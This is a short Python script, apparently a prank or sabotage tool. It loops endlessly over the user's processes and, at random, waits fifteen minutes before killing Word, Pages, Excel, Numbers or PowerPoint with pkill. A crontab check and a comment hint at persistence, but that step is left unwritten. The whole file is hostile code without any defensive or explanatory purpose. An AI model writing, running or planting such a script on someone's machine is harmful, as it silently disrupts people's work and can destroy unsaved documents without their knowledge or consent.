#!/usr/bin/env python3
import os
import subprocess
import time
import random

cronJobs	= subprocess.check_output("crontab -l", shell = True)
activeUser	= str(subprocess.check_output("whoami", shell = True))[2:-3]
psCommand	= ("ps -u " + activeUser)

def go():
	while 7 == 7:
		processes = str(subprocess.check_output(psCommand, shell = True))
		doIt = random.choice(range(2))
		doit = 0
		if doIt == 0:
			if "Word" in processes:
				time.sleep(900)
				os.system("pkill Word")
			elif "Pages" in processes:
				time.sleep(900)
				os.system("pkill Pages")
			elif "Excel" in processes:
				time.sleep(900)
				os.system("pkill Excel")
			elif "Numbers" in processes:
				time.sleep(900)
				os.system("pkill Numbers")
			elif "Powerpoint" in processes:
				time.sleep(900)
				os.system("pkill PowerPoint")


if os.path.realpath(__file__) in str(cronJobs):
	go()
else:
	# Add to crontab
	go()